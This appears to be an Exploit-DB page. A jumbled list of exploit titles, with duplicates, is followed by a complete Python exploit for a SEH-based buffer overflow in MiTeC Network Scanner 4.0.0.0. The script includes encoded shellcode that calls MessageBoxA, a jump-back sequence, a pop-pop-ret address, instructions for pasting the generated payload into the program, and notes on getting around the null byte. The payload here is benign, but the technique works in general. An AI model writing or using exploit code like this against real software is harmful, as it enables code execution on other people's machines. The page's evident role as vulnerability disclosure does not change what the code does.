f1ca42d762
1 new exploits WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python) WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl) Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) (PoC) Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (Internet Explorer 7 / Firefox / Opera) Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal Exploit PHP-CON 1.3 - (include.php) Remote File Inclusion PHP-CON 1.3 - 'include.php' Remote File Inclusion RealPlayer 11 - Malformed AU File Denial of Service RealPlayer 11 - '.au' Denial of Service VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization (PoC) VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization Nullsoft Winamp 5.32 - MP4 tags Stack Overflow Nullsoft Winamp 5.32 - MP4 Tags Stack Overflow viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion Samba 3.0.27a - send_mailslot() Remote Buffer Overflow (PoC) Samba 3.0.27a - send_mailslot() Remote Buffer Overflow Horde Web-Mail 3.x - (go.php) Remote File Disclosure CuteNews 1.1.1 - (html.php) Remote Code Execution Horde Web-Mail 3.x - 'go.php' Remote File Disclosure CuteNews 1.1.1 - 'html.php' Remote Code Execution TUTOS 1.3 - (cmd.php) Remote Command Execution TUTOS 1.3 - 'cmd.php' Remote Command Execution PHP Webquest 2.6 - (id_actividad) SQL Injection Move Networks Quantum Streaming Player - Overwrite (SEH) Gateway Weblaunch - ActiveX Control Insecure Method Exploit PHP Webquest 2.6 - 'id_actividad' Parameter SQL Injection Move Networks Quantum Streaming Player - SEH Overflow Gateway Weblaunch - ActiveX Control Insecure Method Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC) McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC) Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow StreamAudio ChainCast ProxyManager - ccpm_0237.dll Buffer Overflow StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Buffer Overflow XnView 1.92.1 - Slideshow (FontName) Buffer Overflow XnView 1.92.1 - (FontName) Slideshow Buffer Overflow Phaos R4000 Version (file) - Remote File Disclosure Phaos R4000 Version - 'file' Remote File Disclosure ASPPortal Free Version (Topic_Id) - SQL Injection ASPPortal Free Version - 'Topic_Id' SQL Injection Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection XnView 1.97.4 - MBM File Remote Heap Buffer Overflow XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow Fortigate OS Version 4.x < 5.0.7 - SSH Backdoor Fortigate OS 4.x < 5.0.7 - SSH Backdoor Network Scanner Version 4.0.0.0 - SEH Crash (PoC) Network Scanner 4.0.0.0 - SEH Crash (PoC) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Ruby on Rails - Dynamic Render File Upload / Remote Code Execution Network Scanner 4.0.0 - SEH Local Buffer Overflow
71 lines
No EOL
2.1 KiB
Python
Executable file
71 lines
No EOL
2.1 KiB
Python
Executable file
#!/usr/bin/python
|
|
# -*- coding: utf-8 -*-
|
|
|
|
### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###
|
|
|
|
# Date: 2016-10-21
|
|
# Exploit Author: n30m1nd
|
|
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
|
|
# Vendor Homepage: http://www.mitec.cz/
|
|
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
|
|
# Version: 4.0.0.0
|
|
# Tested on: Win7 64bit and Win10 64 bit
|
|
|
|
# Credits
|
|
# =======
|
|
# PoC by: INSECT.B - http://binsect00.tistory.com
|
|
# https://www.exploit-db.com/exploits/39447/
|
|
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
|
|
|
|
# How to
|
|
# ======
|
|
# * Run this python script. It will generate an "exploit.txt" file.
|
|
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
|
|
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time
|
|
|
|
# Exploit code
|
|
# ============
|
|
|
|
import struct
|
|
|
|
# MessageBoxA in NetScan.exe => 004042F1
|
|
mbox = (
|
|
"\x25\x41\x41\x41"
|
|
"\x41\x25\x32\x32"
|
|
"\x32\x32\x50\x68"
|
|
"\x70\x77\x6E\x64"
|
|
"\x54\x5F\x50\x57"
|
|
"\x57\x50\x35\x8E"
|
|
"\x60\x60\x55\x35"
|
|
"\x7F\x22\x20\x55"
|
|
"\x50\xC3"
|
|
)
|
|
# JUMP BACK to our shellcode!
|
|
nseh = (
|
|
# xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
|
|
"\x34\x51"
|
|
# jne -32h; Jump if ZF = 0
|
|
"\x75\xCC"
|
|
)
|
|
# pop pop ret => 00402E67
|
|
sehh = struct.pack("<L", 0x00402e67)
|
|
|
|
payl = "A" * (76-48)
|
|
payl+= mbox
|
|
payl+= "A"*(48-len(mbox))
|
|
payl+= nseh + sehh
|
|
|
|
with open("exploit.txt","wb") as f:
|
|
f.write(payl[:-1])
|
|
print payl
|
|
|
|
"""
|
|
NOTE:
|
|
The original author of this PoC stated that it was not possible to be
|
|
exploited since all addresses inside the binary contain the null byte.
|
|
As you can see in this exploit, the null byte is added by default at
|
|
the end because strings are null terminated when read from an input
|
|
box. This is why we write the payload minus 1 byte, payl[:-1], because
|
|
we don't need to write the last null byte for the "pop pop ret" jump
|
|
in the "sehh" variable.
|
|
""" |